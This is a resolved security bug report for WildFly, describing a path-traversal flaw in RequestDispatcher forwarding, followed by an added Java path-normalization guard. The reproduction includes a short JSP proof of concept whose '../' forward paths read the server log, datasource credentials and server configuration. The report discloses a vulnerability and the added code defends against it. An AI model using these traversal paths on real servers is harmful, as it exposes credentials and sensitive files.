- Type: Bug
- Status: Resolved
- Priority: Blocker
- Resolution: Done
- Affects Version/s: None
- Fix Version/s: 1.4.0.Beta1, 1.3.20.Final, 2.0.0.Alpha1
- Component/s: None
- Labels: None
- Environment: Wildfly 8.2.1.Final, Wildfly 9.0.2.Final, Wildfly 10.0.0.Final
- Security Sensitive Issue: This issue is security relevant
Steps to Reproduce:
We just found that RequestDispatcher forward can access files outside its deployment context. Consider the following example:
In foo.war, foo.jsp:
<%
// you are in $WILDFLY_HOME/standalone/tmp/vfs/temp/tempXXX/foo.war-XXX/
request.getRequestDispatcher("/../../../../../log/server.log").forward(request, response); // can access the server log
request.getRequestDispatcher("/../../../../../deployments/foo-ds.xml").forward(request, response); // can access the sensitive data in the data source deployment xml
request.getRequestDispatcher("/../../../../../configuration/standalone-full.xml").forward(request, response); // can access server configurations
// ... can access the whole file system!!!
%>
NOTE: we believe the other methods in RequestDispatcher (i.e. .include(...), .error(...)) should contain the same issue.
This issue has already been tested in Wildfly 8.2.1.Final, 9.0.2.Final and 10.0.0.Final; all of them contain this security vulnerability.
Also tested in JBoss AS 7.2.0.Final (i.e. using JBoss Web), which does not contain this security vulnerability.
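The root cause the report describes is a dispatcher path that is handed to the file system without first being canonicalized against the context root. The following is an added example, not Undertow's or WildFly's fix and not code from the reporter: a small lexical guard that resolves "." and ".." segments of a context-relative dispatcher path and rejects any path that would climb above the context root (or that is not context-relative at all). The class name, the treatment of backslashes, and the assumption that the string has not been percent-decoded by the container are all choices made for this example; a container's real implementation would apply the same normalization before mapping the path to a resource.

```java
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.Locale;

/** Lexical guard for context-relative dispatcher paths (added example, not Undertow code). */
public final class DispatcherPathGuard {

    private DispatcherPathGuard() {}

    /**
     * Returns the normalized path if it stays inside the context root,
     * or null if the path must be rejected.
     */
    public static String normalizeWithinContext(String path) {
        if (path == null || !path.startsWith("/")) {
            return null;                 // dispatcher targets must be context-relative
        }
        if (path.indexOf('\\') >= 0) {
            return null;                 // never treat a backslash as a separator
        }
        int q = path.indexOf('?');       // the query string plays no part in path resolution
        String pathOnly = q >= 0 ? path.substring(0, q) : path;
        String query = q >= 0 ? path.substring(q) : "";

        // Assumption for this example: the container has not percent-decoded the
        // string, so an encoded dot or separator is treated as hostile, not decoded.
        String lower = pathOnly.toLowerCase(Locale.ROOT);
        if (lower.contains("%2e") || lower.contains("%2f") || lower.contains("%5c")) {
            return null;
        }

        Deque<String> segments = new ArrayDeque<>();
        for (String seg : pathOnly.split("/")) {
            if (seg.isEmpty() || seg.equals(".")) {
                continue;                // "//" and "/./" contribute nothing
            }
            if (seg.equals("..")) {
                if (segments.isEmpty()) {
                    return null;         // would climb above the context root
                }
                segments.removeLast();   // legal: pops a segment that is still inside
                continue;
            }
            segments.addLast(seg);
        }

        StringBuilder sb = new StringBuilder();
        for (String seg : segments) {
            sb.append('/').append(seg);
        }
        if (sb.length() == 0) {
            sb.append('/');              // everything collapsed to the context root itself
        }
        return sb.append(query).toString();
    }

    public static void main(String[] args) {
        // Constructed samples; the first one is the path quoted in the report.
        String[] samples = {
            "/../../../../../log/server.log",      // from the report: must be rejected
            "/WEB-INF/views/../../index.jsp",       // stays inside the context: /index.jsp
            "/WEB-INF/../../outside.txt",           // climbs out after one legal pop: rejected
            "/a/./b//c/../d?x=1",                   // noise segments collapse: /a/b/d?x=1
            "relative.jsp",                        // not context-relative: rejected
        };
        for (String s : samples) {
            String out = normalizeWithinContext(s);
            System.out.printf("%-36s -> %s%n", s, out == null ? "REJECTED" : out);
        }
    }
}
```

Compile and run with `javac DispatcherPathGuard.java && java DispatcherPathGuard`. The check is purely lexical on purpose: it runs before any file-system or VFS lookup, so a path that tries to leave the deployment never reaches the resource manager. Note that forwarding into WEB-INF is still allowed, as the servlet specification permits for internal dispatch; the guard only enforces the context-root boundary.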